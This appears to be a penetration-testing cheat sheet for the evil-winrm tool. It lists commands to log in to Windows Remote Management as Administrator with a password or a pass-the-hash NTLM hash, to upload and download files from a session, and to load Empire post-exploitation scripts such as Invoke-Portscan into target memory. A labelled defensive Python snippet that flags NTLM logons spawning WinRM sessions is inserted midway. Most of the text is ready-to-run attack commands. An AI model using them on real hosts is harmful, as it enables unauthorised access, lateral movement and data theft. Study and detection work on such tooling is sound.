2022-11-13 16:00:22 +01:00
# evil-winrm
* Authenticate with either a password or an NTLM hash
```sh
evil-winrm -u Administrator -H <Hash> -i <IP>
evil-winrm -u Administrator -p <Password> -i <IP> -P <Port>
```
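
For the defending side, an added example (not part of the original cheat sheet) that correlates NTLM network logons with a WinRM host process in the same logon session. It assumes Security events 4624 and 4688 have been exported to flat records, that process-creation auditing is enabled, and that the 4688 `TargetLogonId` field carries the remote session's logon ID; all sample values are constructed.

```python
# Constructed sample records (flattened Security events); values are made up.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "IpAddress": "192.0.2.10",
     "TargetLogonId": "0x5a1f3"},
    {"EventID": 4688, "TargetLogonId": "0x5A1F3",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "svc-backup", "IpAddress": "192.0.2.20",
     "TargetLogonId": "0x6b200"},
    {"EventID": 4688, "TargetLogonId": "0x6b200",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jdoe", "IpAddress": "192.0.2.30",
     "TargetLogonId": "0x7c411"},  # NTLM logon with no WinRM process (e.g. SMB)
]

WINRM_HOST = "wsmprovhost.exe"  # process that hosts remote WinRM/PowerShell sessions


def ntlm_winrm_sessions(events):
    """Return NTLM network logons whose session then starts wsmprovhost.exe.

    The logon event does not show whether a hash or a password was presented,
    so every hit is a lead to review, not proof of pass-the-hash.
    """
    pending = {}   # logon ID -> 4624 record awaiting a matching 4688
    findings = []
    for ev in events:  # events are expected in chronological order
        logon_id = str(ev.get("TargetLogonId", "")).lower()
        if ev.get("EventID") == 4624:
            is_network = ev.get("LogonType") == 3
            is_ntlm = ev.get("AuthenticationPackageName") == "NTLM"
            is_machine = str(ev.get("TargetUserName", "")).endswith("$")
            if is_network and is_ntlm and not is_machine:
                pending[logon_id] = ev
        elif ev.get("EventID") == 4688:
            image = ev.get("NewProcessName", "").lower().rsplit("\\", 1)[-1]
            if image == WINRM_HOST and logon_id in pending:
                logon = pending.pop(logon_id)  # report each session once
                findings.append({"user": logon["TargetUserName"],
                                 "source_ip": logon["IpAddress"],
                                 "logon_id": logon_id})
    return findings


if __name__ == "__main__":
    for hit in ntlm_winrm_sessions(SAMPLE_EVENTS):
        print("NTLM-authenticated WinRM session:", hit)
```
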
## Upload & Download
* Inside an open session
```sh
upload <attackerFilePath>
download <remoteFilePath> <attackerFilePath>
```
## Load PowerShell Scripts into Target Memory
* Load scripts from a local directory into the target's memory with `-s`
```sh
evil-winrm -u <user> -p <password> -i <IP> -s <localScriptDir>
```
* Example: load the Empire scripts directory for port scanning
```sh
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
```
* Initialize `Invoke-Portscan.ps1` in the session
* Check its usage with `Get-Help Invoke-Portscan`
```sh
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
```